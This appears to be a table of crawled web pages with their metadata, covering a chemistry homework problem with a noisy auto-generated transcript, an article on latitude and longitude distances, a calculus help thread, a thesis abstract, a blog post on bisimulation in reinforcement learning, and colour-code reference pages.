URL (stringlengths 15–1.68k) | text_list (sequencelengths 1–199) | image_list (sequencelengths 1–199) | metadata (stringlengths 1.19k–3.08k)
---|---|---|---|
https://www.numerade.com/questions/hemoglobin-a-protein-in-red-blood-cells-carries-mathrmo_2-from-the-lungs-to-the-bodys-cells-iron-as-/ | [
"Black Friday is Here! Start Your Numerade Subscription for 50% Off!Join Today",
null,
"### What is the difference between an empirical formu…\n\n02:06",
null,
"University of Toronto\nProblem 31\n\n# Hemoglobin, a protein in red blood cells, carries $\\mathrm{O}_{2}$ from the lungs to the body's cells. Iron (as ferrous ion, Fe $^{2+} )$ makes up 0.33 mass $\\%$ of hemoglobin. If the molar mass of hemoglobin is $6.8 \\times 10^{4} \\mathrm{g} / \\mathrm{mol},$ how many $\\mathrm{Fe}^{2+}$ ions are in one molecule?\n\n## Discussion\n\nYou must be signed in to discuss.\n\n## Video Transcript\n\nSo we're keeping the hemoglobin containing iron. I am, too. So, um, for the mass percentage for Ianto off specific for iron this iron two plus 0.50% mass percentage and assumed overall more The masters exploiting eight time tender, powerful gram per mole. How many iron to ah lions getting one hemoglobin. So, first offal from Peter. We should be Ah, Richard. Okay. We should find ah, mass con tribute to the overall More the mass if you will go by and by our in. Okay, so we know that. Ah, Toto, I am, um or the mass remembers Total. I am on the mass, so we don't know how many of them. But we just know for a particular proportion off that off our mass Ah, it should be cause one to iron. So we're 6.8 times hand to allow for and they have multiply Ah, by zero point Flee Flee the white by 100 proof soup on three for yourself, a sand age So we have to divide by 100 then we should be able to find out from the course on being mass con tribute by our. So it will be 2 to 4.4 gram per bowl. It is a correspondent. Ooh, I am. But we don't know how many off them. All right, so, um, barely contain iron Embry from drop you on your table. That I am more than mass is Ah for the thief 5.85 grand for moat. So therefore ah, we can use the total mass or that's contribute by aren't divided by the mass of each kind. And then we we note the lumber off the lumber off iron, so number all fine. So you be equals throughout 2 to 4.4, do you? Why the buyer? Each off the island. And then we should have ah, um number two do for 1 44 by 55.85 and then it will be roughly around 4.0. Um, to but because we were counting harmony, number off. How many? I so it should be a whole number. So we just went down to four, 24 So therefore, in each of the whole groping"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.87018085,"math_prob":0.9691492,"size":6126,"snap":"2020-45-2020-50","text_gpt3_token_len":1658,"char_repetition_ratio":0.16938908,"word_repetition_ratio":0.15595463,"special_character_ratio":0.28305584,"punctuation_ratio":0.10448916,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9779793,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-27T00:37:12Z\",\"WARC-Record-ID\":\"<urn:uuid:4bdbbe03-1776-44e1-a365-38e5100647d2>\",\"Content-Length\":\"118275\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7b27d7b9-c3d8-4b79-b07e-e292f1cae5af>\",\"WARC-Concurrent-To\":\"<urn:uuid:c863772a-4716-4a91-bba1-6ebfe39dab8c>\",\"WARC-IP-Address\":\"35.165.236.34\",\"WARC-Target-URI\":\"https://www.numerade.com/questions/hemoglobin-a-protein-in-red-blood-cells-carries-mathrmo_2-from-the-lungs-to-the-bodys-cells-iron-as-/\",\"WARC-Payload-Digest\":\"sha1:64WNUGHMKOYHSVKGQZ3AWBUE5AAZYS5V\",\"WARC-Block-Digest\":\"sha1:45NZGJX7MREBJOWQEDDZNRVIVCANBUXC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141189030.27_warc_CC-MAIN-20201126230216-20201127020216-00184.warc.gz\"}"} |
https://otasurvivalschool.com/navigation/distance-between-degrees-of-latitudes-and-longitudes/ | [
"# Distance Between Degrees of Latitudes and Longitudes\n\nWith the specification of latitudes and longitudes, it has become very easy to exactly pinpoint a location anywhere on the surface of this Earth. The grid system that makes up latitudes and longitudes divides the Earth into neat little sections making it quite easy for anyone to either explain to someone or for someone to understand the position one is talking about. It is much much easier to explain and infinitely simpler to understand a set of numbers representing a particular position rather than going into a virtual verbal diarrhoea - near the bridge, across the river, in front of the tall building, where the cow grazes every morning ... no, no, no, not where your uncle lives, where my sister's boyfriend (the second one) used to work before he moved to where there is a river flowing into the ocean. Whoopie!!! It is so much simpler to say N 22°11'25\" E 79°23'42\" representing the latitude and longitude of the location we are trying to explain.\n\n## What we need to remember is the fact that latitudes and longitudes are not squares, though they might appear so on an atlas.\n\nLatitudes are parallel lines to each other. There are 180° of latitude from Pole to Pole, with the Equator being at 0° and the North and South Poles at 90°N and 90°S respectively. Longitudes on the other hand are not parallel. They start and converge at the Poles with them being at the widest distance from each other at the Equator.\n\nAT THE EQUATOR, the distance between two corresponding degrees of latitude and two corresponding degrees of longitudes are roughly the same - about 111 km. So, if were lost at sea, at the Equator and were able to signal your coordinates in a Mayday call, and were correct to within 1° of latitude and longitude, the search would be looking at an area of over 12,000 sq km! The more accurate you are, the greater the chances of your being rescued quickly. The sea is a very big place to be going out on a wild goose chase.\n\nLet us take a look at the distances between various degrees of latitudes.\n\n Latitude 0 -1° 9 - 10° 19 - 20° 29 - 30° 39 - 40° 49 - 50° 59 - 60° 69 - 70° 79 - 80° 89 - 90°\n Distance in Kms 110.567 110.598 110.692 110.840 111.023 111.220 111.406 111.560 111.661 111.699\n\nLongitudes are a different matter altogether since they are not parallel, but converge at the two Poles. The distance between two degrees of longitude is maximum at the Equator, about 111 km, and the minimum at the Poles, 0 km. At every place in between the Equator and the Poles, the distance between two corresponding degrees of longitude will change. Actually, you do not need to know your longitude at all, you need to know your latitude.\n\nThe distance between two degrees of longitude equals the cosine of the latitude in decimal degrees, multiplied by the distance at the Equator. So, if we are trying to find the distance between longitudes at N 22°11'25\", we need to first convert the latitude into decimal degrees, using the formula:\n\nDecimal Degrees = degrees + (minutes/60) + (seconds/3600)\n\n22 + 11/60 + 25/3600.\nOr\n22 + 0.18333333 + 0.00694444 = 22.19027777 decimal degrees"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89684534,"math_prob":0.98046875,"size":3622,"snap":"2020-45-2020-50","text_gpt3_token_len":909,"char_repetition_ratio":0.15671642,"word_repetition_ratio":0.022580646,"special_character_ratio":0.28575373,"punctuation_ratio":0.123978205,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9555088,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-27T05:50:20Z\",\"WARC-Record-ID\":\"<urn:uuid:2efba55e-91ef-467d-94eb-26079e1d08e8>\",\"Content-Length\":\"115044\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d3158036-53ba-4269-b260-4c6eac9ad2fb>\",\"WARC-Concurrent-To\":\"<urn:uuid:8c7ce3ec-2a69-43d2-adc9-fbb4b283c26a>\",\"WARC-IP-Address\":\"35.213.155.215\",\"WARC-Target-URI\":\"https://otasurvivalschool.com/navigation/distance-between-degrees-of-latitudes-and-longitudes/\",\"WARC-Payload-Digest\":\"sha1:JFRFR5WP4NGQ7HSW5EFS5WVTHLRXUVFJ\",\"WARC-Block-Digest\":\"sha1:FEDTJIEFKRQFNQRKDUMVELA4GIBQWEWN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107893402.83_warc_CC-MAIN-20201027052750-20201027082750-00671.warc.gz\"}"} |
https://www.jiskha.com/questions/135196/how-do-i-integrate-2u-du-u-2-2u-2-so-i-used-subsitution-rule-or-can-i-used-integration | [
"# integrate\n\nhow do i integrate\n\n2u du /u-2+2u^2\n\nso i used subsitution rule?\nor can i used integration by parts and how? thanks in adnvace\n\n1. 👍 0\n2. 👎 0\n3. 👁 97\nasked by allison\n1. Is all of u -2 +2u^2\na denominator?\n\nThat is (2u-1)(u+1)\n\nSo you would be integrating\n2u/[(2u-1)(u+1)]\n\nThe method of partial fractions can be used.\n\nSee\nhttp://www.math.ucdavis.edu/~kouba/CalcTwoDIRECTORY/partialfracdirectory/PartialFrac.html\n\n1. 👍 0\n2. 👎 0\nposted by drwls\n\n## Similar Questions\n\n1. ### Integral calculus\n\nPlease do help solve the followings 1) Integrate e^4 dx 2) Integrate dx/sqrt(90^2-4x^2) 3) Integrate (e^x+x)^2(e^x+1) dx 4) Integrate xe^x2 dx e^4 is a constant. 3) let u= e^x + x du= (e^x + 1)dx 4) let u= x du=dx v= e^x dv= e^x\n\nasked by Febby-1 on April 13, 2007\n2. ### calculus\n\n1) Integrate Cos^n(x) dx 2) Integrate e^(ax)Sinbx dx 3) Integrate (5xCos3x) dx I Will be happy to critique your thinking on these. 1) Derive a recursive relation. 2) Simplest by replacing sin(bx) by Exp[i b x] and taking imaginary\n\nasked by Febby on April 13, 2007\n3. ### Calculus\n\n6.] Replace the integral in exercise 5 (int. (1/ 1 – t) dt a = 0, b = 1/2with ?1/(1+t) dt with a = 0, b = 1, and repeat the four steps. a. integrate using a graphing utility b. integrate exactly c. integrate by replacing the\n\nasked by Rajeev on October 16, 2011\n4. ### Calc 1\n\nintegrate from 0 to pi/4 (sec^2x)/((1+7tanx)^2)^1/3 integrate form pi^2/36 to pi^2/4 (cos(x^1/2))/(xsin(x^1/2))^1/2 integrate from 0 to pi/3 (tanx)/(2secx)^1/2\n\nasked by Frank on November 30, 2012\n5. ### Caculus\n\nintegrate x^(1/2)e^x.dx from 0 to 4, n=12 1) the trapezoidal rule\n\nasked by chen on November 24, 2010\n6. ### calculus 2\n\nJustify, with a written explanation or a mathematical reasoning and with a sketch of at least two different cases, the following properties of integrals: a) If f(x) is less than or equal to g(x) for a\n\nasked by bobby on September 12, 2012\n7. ### Calculus II/III\n\nA. Find the integral of the following function. Integral of (x√(x+1)) dx. B. Set up and evaluate the integral of (2√x) for the area of the surface generated by revolving the curve about the x-axis from 4 to 9. For part B of\n\nasked by Ryoma on February 19, 2007\n8. ### Maths\n\nIntegrate (4e^-x)/3sqrd 1+3e^-x) using Trapezium rule with 6 intervals.\n\nasked by Bernadene on August 6, 2016\n9. ### Maths\n\nQuestion : Integrate [x/(1+(sin a*sin x))] from 0 to pi My first thought was to apply integrate f(x) dx= f(a-x) dx method Which simplified the integral into; 2I = integrate [pi/(1+(sin a*sin x))] dx , cancelling out x Then I made\n\nasked by Ashley on March 18, 2019\n10. ### Calc\n\nHow do you solve ∫sin(3x+4)dx? I got the -cos(3x+4) part, but do you have to integrate the 3x+4 too? Does chain rule apply?\n\nasked by Erica on January 2, 2011\n\nMore Similar Questions"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8705292,"math_prob":0.98993003,"size":2286,"snap":"2019-35-2019-39","text_gpt3_token_len":839,"char_repetition_ratio":0.15512708,"word_repetition_ratio":0.009661836,"special_character_ratio":0.34776902,"punctuation_ratio":0.07884616,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9982215,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-21T06:08:24Z\",\"WARC-Record-ID\":\"<urn:uuid:df04e42f-2719-4437-a8e3-cc60c0997aaf>\",\"Content-Length\":\"19758\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:97ccd2f4-c18a-49e7-8adf-c56664bd44cf>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b1c026c-74f6-41f9-b989-125614d3c0af>\",\"WARC-IP-Address\":\"66.228.55.50\",\"WARC-Target-URI\":\"https://www.jiskha.com/questions/135196/how-do-i-integrate-2u-du-u-2-2u-2-so-i-used-subsitution-rule-or-can-i-used-integration\",\"WARC-Payload-Digest\":\"sha1:WXCWIXEOWMSDHZFB7WGQFRVMWY4HJ732\",\"WARC-Block-Digest\":\"sha1:22BSOC26KGBFTGF6QCH2DOATHT7APZLC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027315809.69_warc_CC-MAIN-20190821043107-20190821065107-00115.warc.gz\"}"} |
https://rshare.library.ryerson.ca/articles/thesis/Analysis_of_psychometric_data_using_statistical_and_machine_learning_methods/14665509/1 | [
"Subramanian_Krishnapriya.pdf (797.79 kB)\n\n# Analysis of psychometric data using statistical and machine learning methods\n\nthesis\nposted on 24.05.2021, 14:56 authored by Krishnapriya Subramanian\nThe objective of this thesis is to analyse the psychometric data using statistical and machine learning methods. Psychological data are analysed to predict illness and injury of athletes. Regression technique, one of the statistical processes for estimating the relationship among variables is used as basis of this thesis. We apply the linear regression, time series and logistics regression to predict illness and well-being. Our linear regression simulation results are mainly used, to understand the data well. By reviewing the results of linear regression, time series model is developed which predicts sickness one day ahead. The predicted values of this time series model are continuous. However, logistic regression can be used, to provide a probabilistic approach to predict the future levels as a categorical value. Hence we have developed a binomial logistics regression model, when observation variable is the type of dichotomous. Our simulation results show that this prediction model performs well. Our empirical studies also show that our method can act as early warning system for athletes.\n\neng\n\n## Degree\n\nMaster of Engineering\n\n## Program\n\nElectrical and Computer Engineering\n\n## Granting Institution\n\nRyerson University\n\nThesis\n\n## Exports\n\nfigshare. credit for all your research."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9113325,"math_prob":0.75750893,"size":1254,"snap":"2022-40-2023-06","text_gpt3_token_len":229,"char_repetition_ratio":0.1232,"word_repetition_ratio":0.03314917,"special_character_ratio":0.17464115,"punctuation_ratio":0.1042654,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9550051,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T19:51:53Z\",\"WARC-Record-ID\":\"<urn:uuid:2b6257f4-29d4-40f9-9fc9-469c10f16035>\",\"Content-Length\":\"148274\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cc141fed-e67b-4a16-9e34-2af2a9a8fa5a>\",\"WARC-Concurrent-To\":\"<urn:uuid:4e3aa379-91f8-4381-92d9-52f46df38bcc>\",\"WARC-IP-Address\":\"52.214.212.208\",\"WARC-Target-URI\":\"https://rshare.library.ryerson.ca/articles/thesis/Analysis_of_psychometric_data_using_statistical_and_machine_learning_methods/14665509/1\",\"WARC-Payload-Digest\":\"sha1:ELUBFGF7NUO3FMLQULM33HO3WLXFE3TN\",\"WARC-Block-Digest\":\"sha1:6KOUP42JUQRXSRRHXOKZJGAL7YODTHBV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337663.75_warc_CC-MAIN-20221005172112-20221005202112-00448.warc.gz\"}"} |
https://paperexplained.cn/articles/article/sdetail/de8707a1-fdf2-44b4-839c-a8db4adc194c/ | [
"",
null,
"# For: Learning Invariant Representations for Reinforcement Learning without Reconstruction\n\n536\n\n## 算法(Deep Bisimulation for Control, DBC)\n\n### Bisimulation\n\n\\begin{align*} \\mathcal{R} (s_i, a) &= \\mathcal{R}\\mathcal(s_j, a) & \\forall a \\in \\mathcal{A} \\tag{1}\\\\ \\mathcal{P}(G\\vert s_i, a) &= \\mathcal{P}(G\\vert s_j, a) & \\forall a \\in \\mathcal{A}, \\forall G \\in \\mathcal{S}_B \\tag{2} \\end{align*}\n\n$$d(s_i, s_j) = \\max_{a\\in\\mathcal{A}} (1-c)\\cdot \\vert \\mathcal{R}_{s_i}^a - \\mathcal{R}_{s_j}^a \\vert + c \\cdot W_1(\\mathcal{P}_{s_i}^a, \\mathcal{P}_{s_j}^a;d) \\tag{3}$$\n\nBisimulation 指标直接反映了两个状态的行为等效程度。以图一为例,图一中三个驾驶背景(左上、右上、右下)应该是行为等效的。如果我们能够学习到一个编码器,它编码得到的状态可以直接反映Bisimulation 指标,那么此编码器的范化性应该会非常好。\n\n## 参考文献\n\n Zhang, Amy, et al. \"Learning invariant representations for reinforcement learning without reconstruction.\"arXiv preprint arXiv:2006.10742(2020).\n\n Wasserstein distance between two Gaussians,https://djalil.chafai.net/blog/2010/04/30/wasserstein-distance-between-two-gaussians/\n\n Givens, Clark R., and Rae Michael Shortt. \"A class of Wasserstein metrics for probability distributions.\"Michigan Mathematical Journal31.2 (1984): 231-240.\n\n Chua, Kurtland, et al. \"Deep reinforcement learning in a handful of trials using probabilistic dynamics models.\"Advances in neural information processing systems31 (2018).\n\n Haarnoja, Tuomas, et al. \"Soft actor-critic: Off-policy maximum entropy deep reinforcement learning with a stochastic actor.\"International conference on machine learning. PMLR, 2018.\n\nArticle Tags\n[本]通信工程@河海大学 & [硕]CS@清华大学\n\n0\n536\n0\n\nMore Recommendations",
] | [
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.8797017,"math_prob":0.9633682,"size":4191,"snap":"2023-14-2023-23","text_gpt3_token_len":2976,"char_repetition_ratio":0.0907571,"word_repetition_ratio":0.0,"special_character_ratio":0.21999523,"punctuation_ratio":0.09584087,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934835,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-10T10:20:31Z\",\"WARC-Record-ID\":\"<urn:uuid:4a000132-ae05-4c1f-a231-49077954f977>\",\"Content-Length\":\"64516\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8bc99bc7-36ff-4392-a156-1be361f7710a>\",\"WARC-Concurrent-To\":\"<urn:uuid:66ac818b-8ffb-4855-a3c5-d203930e80dc>\",\"WARC-IP-Address\":\"1.15.40.245\",\"WARC-Target-URI\":\"https://paperexplained.cn/articles/article/sdetail/de8707a1-fdf2-44b4-839c-a8db4adc194c/\",\"WARC-Payload-Digest\":\"sha1:TNZHTQXDQ6IW7AENIAA7MPT5ECCSTZ6V\",\"WARC-Block-Digest\":\"sha1:HT2VRJO7BEC5QNWQBZIKXIHZYJPE7AI3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224657169.98_warc_CC-MAIN-20230610095459-20230610125459-00247.warc.gz\"}"} |
https://www.colorhexa.com/27d7b8 | [
"# #27d7b8 Color Information\n\nIn a RGB color space, hex #27d7b8 is composed of 15.3% red, 84.3% green and 72.2% blue. Whereas in a CMYK color space, it is composed of 81.9% cyan, 0% magenta, 14.4% yellow and 15.7% black. It has a hue angle of 169.4 degrees, a saturation of 69.3% and a lightness of 49.8%. #27d7b8 color hex could be obtained by blending #4effff with #00af71. Closest websafe color is: #33cccc.\n\n• R 15\n• G 84\n• B 72\nRGB color chart\n• C 82\n• M 0\n• Y 14\n• K 16\nCMYK color chart\n\n#27d7b8 color description : Strong cyan.\n\n# #27d7b8 Color Conversion\n\nThe hexadecimal color #27d7b8 has RGB values of R:39, G:215, B:184 and CMYK values of C:0.82, M:0, Y:0.14, K:0.16. Its decimal value is 2611128.\n\nHex triplet RGB Decimal 27d7b8 `#27d7b8` 39, 215, 184 `rgb(39,215,184)` 15.3, 84.3, 72.2 `rgb(15.3%,84.3%,72.2%)` 82, 0, 14, 16 169.4°, 69.3, 49.8 `hsl(169.4,69.3%,49.8%)` 169.4°, 81.9, 84.3 33cccc `#33cccc`\nCIE-LAB 77.573, -49.141, 3.32 33.786, 52.489, 53.696 0.241, 0.375, 52.489 77.573, 49.253, 176.135 77.573, -60.758, 12.73 72.45, -43.546, 6.772 00100111, 11010111, 10111000\n\n# Color Schemes with #27d7b8\n\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #d72746\n``#d72746` `rgb(215,39,70)``\nComplementary Color\n• #27d760\n``#27d760` `rgb(39,215,96)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #279ed7\n``#279ed7` `rgb(39,158,215)``\nAnalogous Color\n• #d76027\n``#d76027` `rgb(215,96,39)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #d7279e\n``#d7279e` `rgb(215,39,158)``\nSplit Complementary Color\n• #d7b827\n``#d7b827` `rgb(215,184,39)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #b827d7\n``#b827d7` `rgb(184,39,215)``\nTriadic Color\n• #46d727\n``#46d727` `rgb(70,215,39)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #b827d7\n``#b827d7` `rgb(184,39,215)``\n• #d72746\n``#d72746` `rgb(215,39,70)``\nTetradic Color\n• #1b9681\n``#1b9681` `rgb(27,150,129)``\n• #1fac93\n``#1fac93` `rgb(31,172,147)``\n• #23c1a6\n``#23c1a6` `rgb(35,193,166)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #3cdcbf\n``#3cdcbf` `rgb(60,220,191)``\n• #51e0c7\n``#51e0c7` `rgb(81,224,199)``\n• #67e3ce\n``#67e3ce` `rgb(103,227,206)``\nMonochromatic Color\n\n# Alternatives to #27d7b8\n\nBelow, you can see some colors close to #27d7b8. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #27d78c\n``#27d78c` `rgb(39,215,140)``\n• #27d79b\n``#27d79b` `rgb(39,215,155)``\n• #27d7a9\n``#27d7a9` `rgb(39,215,169)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #27d7c7\n``#27d7c7` `rgb(39,215,199)``\n• #27d7d5\n``#27d7d5` `rgb(39,215,213)``\n• #27cad7\n``#27cad7` `rgb(39,202,215)``\nSimilar Colors\n\n# #27d7b8 Preview\n\nText with hexadecimal color #27d7b8\n\nThis text has a font color of #27d7b8.\n\n``<span style=\"color:#27d7b8;\">Text here</span>``\n#27d7b8 background color\n\nThis paragraph has a background color of #27d7b8.\n\n``<p style=\"background-color:#27d7b8;\">Content here</p>``\n#27d7b8 border color\n\nThis element has a border color of #27d7b8.\n\n``<div style=\"border:1px solid #27d7b8;\">Content here</div>``\nCSS codes\n``.text {color:#27d7b8;}``\n``.background {background-color:#27d7b8;}``\n``.border {border:1px solid #27d7b8;}``\n\n# Shades and Tints of #27d7b8\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #03100d is the darkest color, while #feffff is the lightest one.\n\n• #03100d\n``#03100d` `rgb(3,16,13)``\n• #06201c\n``#06201c` `rgb(6,32,28)``\n• #09312a\n``#09312a` `rgb(9,49,42)``\n• #0c4238\n``#0c4238` `rgb(12,66,56)``\n• #0f5246\n``#0f5246` `rgb(15,82,70)``\n• #126355\n``#126355` `rgb(18,99,85)``\n• #157363\n``#157363` `rgb(21,115,99)``\n• #188471\n``#188471` `rgb(24,132,113)``\n• #1b957f\n``#1b957f` `rgb(27,149,127)``\n• #1ea58d\n``#1ea58d` `rgb(30,165,141)``\n• #21b69c\n``#21b69c` `rgb(33,182,156)``\n• #24c6aa\n``#24c6aa` `rgb(36,198,170)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\nShade Color Variation\n• #37dbbe\n``#37dbbe` `rgb(55,219,190)``\n• #48dec3\n``#48dec3` `rgb(72,222,195)``\n• #58e1c9\n``#58e1c9` `rgb(88,225,201)``\n• #69e4ce\n``#69e4ce` `rgb(105,228,206)``\n• #79e7d3\n``#79e7d3` `rgb(121,231,211)``\n• #8aead9\n``#8aead9` `rgb(138,234,217)``\n• #9bedde\n``#9bedde` `rgb(155,237,222)``\n• #abf0e4\n``#abf0e4` `rgb(171,240,228)``\n• #bcf3e9\n``#bcf3e9` `rgb(188,243,233)``\n• #ccf6ef\n``#ccf6ef` `rgb(204,246,239)``\n• #ddf9f4\n``#ddf9f4` `rgb(221,249,244)``\n• #eefcf9\n``#eefcf9` `rgb(238,252,249)``\n• #feffff\n``#feffff` `rgb(254,255,255)``\nTint Color Variation\n\n# Tones of #27d7b8\n\nA tone is produced by adding gray to any pure hue. In this case, #7f7f7f is the less saturated color, while #0af4cb is the most saturated one.\n\n• #7f7f7f\n``#7f7f7f` `rgb(127,127,127)``\n• #758985\n``#758985` `rgb(117,137,133)``\n• #6b938c\n``#6b938c` `rgb(107,147,140)``\n• #629c92\n``#629c92` `rgb(98,156,146)``\n• #58a698\n``#58a698` `rgb(88,166,152)``\n• #4eb09f\n``#4eb09f` `rgb(78,176,159)``\n• #44baa5\n``#44baa5` `rgb(68,186,165)``\n• #3bc3ab\n``#3bc3ab` `rgb(59,195,171)``\n• #31cdb2\n``#31cdb2` `rgb(49,205,178)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #1de1be\n``#1de1be` `rgb(29,225,190)``\n• #13ebc5\n``#13ebc5` `rgb(19,235,197)``\n• #0af4cb\n``#0af4cb` `rgb(10,244,203)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #27d7b8 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5582996,"math_prob":0.4989702,"size":3715,"snap":"2021-04-2021-17","text_gpt3_token_len":1698,"char_repetition_ratio":0.12099165,"word_repetition_ratio":0.011111111,"special_character_ratio":0.54697174,"punctuation_ratio":0.23809524,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9817817,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-15T13:55:35Z\",\"WARC-Record-ID\":\"<urn:uuid:cb5e42c9-a8e3-41ac-bb26-5ca1922e86bb>\",\"Content-Length\":\"36317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e683a99d-0d7c-4e06-9f5c-725c2c54a670>\",\"WARC-Concurrent-To\":\"<urn:uuid:f0b409cc-ff98-4f10-b552-572b724ae91a>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/27d7b8\",\"WARC-Payload-Digest\":\"sha1:JBR4IBO2KNJOX63IOFPPRIQGZ76ZWFZC\",\"WARC-Block-Digest\":\"sha1:4CNMGSYXGLLAYROKFAMAKVZCMMQNGRGA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038085599.55_warc_CC-MAIN-20210415125840-20210415155840-00008.warc.gz\"}"} |
https://www.colorhexa.com/020752 | [
"# #020752 Color Information\n\nIn a RGB color space, hex #020752 is composed of 0.8% red, 2.7% green and 32.2% blue. Whereas in a CMYK color space, it is composed of 97.6% cyan, 91.5% magenta, 0% yellow and 67.8% black. It has a hue angle of 236.3 degrees, a saturation of 95.2% and a lightness of 16.5%. #020752 color hex could be obtained by blending #040ea4 with #000000. Closest websafe color is: #000066.\n\n• R 1\n• G 3\n• B 32\nRGB color chart\n• C 98\n• M 91\n• Y 0\n• K 68\nCMYK color chart\n\n#020752 color description : Very dark blue.\n\n# #020752 Color Conversion\n\nThe hexadecimal color #020752 has RGB values of R:2, G:7, B:82 and CMYK values of C:0.98, M:0.91, Y:0, K:0.68. Its decimal value is 132946.\n\nHex triplet RGB Decimal 020752 `#020752` 2, 7, 82 `rgb(2,7,82)` 0.8, 2.7, 32.2 `rgb(0.8%,2.7%,32.2%)` 98, 91, 0, 68 236.3°, 95.2, 16.5 `hsl(236.3,95.2%,16.5%)` 236.3°, 97.6, 32.2 000066 `#000066`\nCIE-LAB 6.991, 29.675, -44.288 1.624, 0.774, 8.046 0.155, 0.074, 0.774 6.991, 53.31, 303.824 6.991, -2.185, -25.624 8.797, 17.55, -48.068 00000010, 00000111, 01010010\n\n# Color Schemes with #020752\n\n• #020752\n``#020752` `rgb(2,7,82)``\n• #524d02\n``#524d02` `rgb(82,77,2)``\nComplementary Color\n• #022f52\n``#022f52` `rgb(2,47,82)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #250252\n``#250252` `rgb(37,2,82)``\nAnalogous Color\n• #2f5202\n``#2f5202` `rgb(47,82,2)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #522502\n``#522502` `rgb(82,37,2)``\nSplit Complementary Color\n• #075202\n``#075202` `rgb(7,82,2)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #520207\n``#520207` `rgb(82,2,7)``\n• #02524d\n``#02524d` `rgb(2,82,77)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #520207\n``#520207` `rgb(82,2,7)``\n• #524d02\n``#524d02` `rgb(82,77,2)``\n• #000107\n``#000107` `rgb(0,1,7)``\n• #010320\n``#010320` `rgb(1,3,32)``\n• #010539\n``#010539` `rgb(1,5,57)``\n• #020752\n``#020752` `rgb(2,7,82)``\n• #03096b\n``#03096b` `rgb(3,9,107)``\n• #030b84\n``#030b84` `rgb(3,11,132)``\n• #040d9d\n``#040d9d` 